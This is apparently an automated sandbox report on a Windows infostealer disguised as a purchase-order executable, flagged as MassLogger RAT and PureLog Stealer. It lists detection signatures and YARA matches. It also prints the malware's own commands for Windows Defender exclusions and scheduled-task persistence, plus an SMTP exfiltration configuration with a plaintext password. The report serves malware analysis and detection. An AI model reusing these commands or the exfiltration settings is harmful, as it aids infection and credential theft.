Edit tour

Windows Analysis Report
PO_2024_056209_MQ04865_ENQ_1045.exe

Overview

General Information

Sample name:	PO_2024_056209_MQ04865_ENQ_1045.exe
Analysis ID:	1582674
MD5:	c12317b003ebc503c85bab87c2104120
SHA1:	71c988096ffbe3e4b6d9976fee29427c9bdbf23f
SHA256:	5454862ee4069df3d2058763ab8d8e01abb4114e628f32305817f31f0ad1fe83
Tags:	exeuser-julianmckein
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Creates files in the system32 config directory

Drops executable to a common third party application directory

Drops large PE files

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Spawns drivers

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO_2024_056209_MQ04865_ENQ_1045.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C12317B003EBC503C85BAB87C2104120)

powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8020 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO_2024_056209_MQ04865_ENQ_1045.exe (PID: 8160 cmdline: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C12317B003EBC503C85BAB87C2104120)

Trading_AIBot.exe (PID: 3448 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)

powershell.exe (PID: 6036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7472 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: B4B82042C00E471AC2399BADB63F1C10)

Microsofts.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)

armsvc.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 72BA8A03C7C6EFEED1AD022BBE6E4CAE)

zeXKjViL.exe (PID: 7272 cmdline: C:\Users\user\AppData\Roaming\zeXKjViL.exe MD5: C12317B003EBC503C85BAB87C2104120)

schtasks.exe (PID: 7984 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

zeXKjViL.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C12317B003EBC503C85BAB87C2104120)

zeXKjViL.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C12317B003EBC503C85BAB87C2104120)

alg.exe (PID: 7304 cmdline: C:\Windows\System32\alg.exe MD5: 73A5E8C4C9FBA1AD14C07468F41BFB78)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 7460 cmdline: C:\Windows\system32\AppVClient.exe MD5: 1B7D1BBDA98AC1FED8DBC0B99926E47C)

FXSSVC.exe (PID: 4628 cmdline: C:\Windows\system32\fxssvc.exe MD5: AC7FF2F8D7B75603AD58755D5762D640)

elevation_service.exe (PID: 7828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: A24F8FAC0C18922003D041CBD7188CCD)

maintenanceservice.exe (PID: 8112 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: AF4EAE172A1ED3A96A4B508B5229B3B2)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\Microsofts.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xffcd:$a1: get_encryptedPassword 0x10309:$a2: get_encryptedUsername 0xfd5a:$a3: get_timePasswordChanged 0xfe7b:$a4: get_passwordField 0xffe3:$a5: set_encryptedPassword 0x119b3:$a7: get_logins 0x11664:$a8: GetOutlookPasswords 0x11442:$a9: StartKeylogger 0x11903:$a10: KeyLoggerEventArgs 0x1149f:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000013.00000002.2962626553.0000000002633000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2918d:$a1: get_encryptedPassword 0x413bd:$a1: get_encryptedPassword 0x595dd:$a1: get_encryptedPassword 0x294c9:$a2: get_encryptedUsername 0x416f9:$a2: get_encryptedUsername 0x59919:$a2: get_encryptedUsername 0x28f1a:$a3: get_timePasswordChanged 0x4114a:$a3: get_timePasswordChanged 0x5936a:$a3: get_timePasswordChanged 0x2903b:$a4: get_passwordField 0x4126b:$a4: get_passwordField 0x5948b:$a4: get_passwordField 0x291a3:$a5: set_encryptedPassword 0x413d3:$a5: set_encryptedPassword 0x595f3:$a5: set_encryptedPassword 0x2ab73:$a7: get_logins 0x42da3:$a7: get_logins 0x5afc3:$a7: get_logins 0x2a824:$a8: GetOutlookPasswords 0x42a54:$a8: GetOutlookPasswords 0x5ac74:$a8: GetOutlookPasswords
Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 7708	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6fa44:$a1: get_encryptedPassword 0x6fd71:$a2: get_encryptedUsername 0x6f7e5:$a3: get_timePasswordChanged 0x6f906:$a4: get_passwordField 0x6fa5a:$a5: set_encryptedPassword 0x713cc:$a7: get_logins 0x7107d:$a8: GetOutlookPasswords 0x70e5b:$a9: StartKeylogger 0x7131c:$a10: KeyLoggerEventArgs 0x70eb8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: zeXKjViL.exe PID: 7272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Microsofts.exe PID: 2124	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 2124	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Microsofts.exe PID: 2124	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 2124	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb617:$a1: get_encryptedPassword 0xb944:$a2: get_encryptedUsername 0xb3b8:$a3: get_timePasswordChanged 0xb4d9:$a4: get_passwordField 0xb62d:$a5: set_encryptedPassword 0xcf9f:$a7: get_logins 0xcc50:$a8: GetOutlookPasswords 0xca2e:$a9: StartKeylogger 0xceef:$a10: KeyLoggerEventArgs 0xca8b:$a11: KeyLoggerEventArgsEventHandler
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283ed:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28729:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2817a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x2829b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28403:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29dd3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a84:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x29862:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x29d23:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler 0x298bf:$a11: KeyLoggerEventArgsEventHandler
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d643:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb41:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce4f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc47:$a5: \Kometa\User Data\Default\Login Data
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.zeXKjViL.exe.41ea2c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x166320:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
19.0.Microsofts.exe.200000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
19.0.Microsofts.exe.200000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.0.Microsofts.exe.200000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
19.0.Microsofts.exe.200000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
19.0.Microsofts.exe.200000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
